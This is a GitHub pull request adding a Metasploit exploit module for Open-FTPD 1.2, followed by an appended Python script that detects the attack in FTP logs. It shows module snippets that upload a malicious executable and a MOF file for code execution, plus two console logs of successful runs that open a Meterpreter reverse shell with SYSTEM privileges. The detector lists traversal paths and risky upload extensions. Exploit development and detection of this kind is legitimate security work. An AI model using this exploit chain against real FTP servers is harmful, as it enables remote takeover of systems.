
Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged (1 commit, Aug 12, 2013)

Conversation


bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

Open-FTPD 1.2 Writable Directory Traversal Execution

jvazquez-r7 commented Aug 12, 2013

send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)

jvazquez-r7 Aug 12, 2013

According to the code, it looks like an arbitrary file upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is that right, or am I forgetting something?

Thanks!

bcoles (author) Aug 12, 2013

You're correct. 'Arbitrary file upload' is more applicable.

jvazquez-r7 Aug 12, 2013

Awesome. In this case, fixing things myself and landing are just minor changes. Thanks @bcoles!

# Upload our malicious executable
u = upload(exe_name)
# Upload the mof file
upload(mof_name) if u

include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,

jvazquez-r7 Aug 12, 2013

Please add the next option to the metadata:

'Stance'         => Msf::Exploit::Stance::Aggressive,

This way the TcpServer will finish once the exploit finishes :). Even though you're using the TcpServer mixin here, it's an aggressive exploit, not a passive one.

jvazquez-r7 commented Aug 12, 2013

Once the comments are clarified by @bcoles, it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013
The Travis CI build passed
jvazquez-r7 commented Aug 12, 2013

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !
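Defender's follow-up to the session output in the tests above (an added example, not part of this PR or of the Metasploit module): a small Python log check that flags, in an FTP server's command log, the behaviour those runs show on the wire. It reports an active-mode PORT whose data target is a host other than the client of the control connection, and STOR commands whose path traverses directories, lands in a wbem\mof directory, or carries an executable or .mof extension. The log line format and every sample line are constructed assumptions, not output from the page.

```python
"""Flag risky FTP upload patterns in a command log (added defensive example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample log (NOT from the page). Assumed format per line:
#   <date> <time> <client_ip> <COMMAND> [<argument>]
SAMPLE_LOG = """\
2013-08-12 09:10:31 192.168.172.1 USER anonymous
2013-08-12 09:10:32 192.168.172.1 TYPE I
2013-08-12 09:10:33 192.168.172.1 PORT 192,168,0,3,31,144
2013-08-12 09:10:34 192.168.172.1 STOR bexsGiK.exe
2013-08-12 09:10:36 192.168.172.1 PORT 192,168,0,3,31,146
2013-08-12 09:10:37 192.168.172.1 STOR ..\\..\\system32\\wbem\\mof\\BRhkiOcs.mof
2013-08-12 09:11:00 10.0.0.7 PORT 10,0,0,7,4,1
2013-08-12 09:11:01 10.0.0.7 STOR reports/q3.pdf
"""

# RFC 959 PORT argument: h1,h2,h3,h4,p1,p2 (port = p1*256 + p2)
PORT_RE = re.compile(r"^(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$")
# ".." as a whole path segment, with either separator style
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# a wbem\mof (or wbem/mof) directory anywhere in the target path
WBEM_MOF_RE = re.compile(r"(^|[\\/])wbem[\\/]mof([\\/]|$)", re.IGNORECASE)
# extensions that should not arrive over an FTP upload channel unannounced
RISKY_EXT = {".exe", ".dll", ".mof", ".bat", ".vbs"}


@dataclass
class Finding:
    line_no: int
    client: str
    command: str
    reason: str
    argument: str


def parse_port(arg: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) from a PORT argument, or None if it is malformed."""
    m = PORT_RE.match(arg.strip())
    if not m:
        return None
    octets = [int(x) for x in m.groups()]
    if any(x > 255 for x in octets):
        return None
    ip = ".".join(str(x) for x in octets[:4])
    return ip, octets[4] * 256 + octets[5]


def stor_reasons(target: str) -> List[str]:
    """List every reason a STOR target looks dangerous (empty if none)."""
    reasons = []
    if TRAVERSAL_RE.search(target):
        reasons.append("path traversal")
    if WBEM_MOF_RE.search(target):
        reasons.append("write into wbem\\mof")
    ext = "." + target.rsplit(".", 1)[-1].lower() if "." in target else ""
    if ext in RISKY_EXT:
        reasons.append(f"risky extension {ext}")
    return reasons


def analyze(log_text: str) -> List[Finding]:
    """Scan one log per line; return one Finding per suspicious PORT or STOR."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(log_text.splitlines(), 1):
        parts = raw.split(None, 4)  # date, time, client, command, argument
        if len(parts) < 4:
            continue
        client, cmd = parts[2], parts[3].upper()
        arg = parts[4] if len(parts) == 5 else ""
        if cmd == "PORT":
            target = parse_port(arg)
            if target is None:
                findings.append(Finding(line_no, client, cmd, "malformed PORT", arg))
            elif target[0] != client:
                # Data connection requested to a host other than the client itself.
                findings.append(Finding(line_no, client, cmd,
                                        f"PORT to third-party host {target[0]}:{target[1]}", arg))
        elif cmd == "STOR":
            reasons = stor_reasons(arg)
            if reasons:
                findings.append(Finding(line_no, client, cmd, "; ".join(reasons), arg))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.command} {f.argument!r} -> {f.reason}")
```

The PORT check is the one most worth keeping: a data connection target that is not the control client is the classic bounce pattern, and in the test output above the PORT address and the client address differ in exactly that way. The path checks are cheap to extend with other directories that the server should never be able to write into; disabling active mode or restricting uploads to a dedicated, non-executable directory removes the condition entirely.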
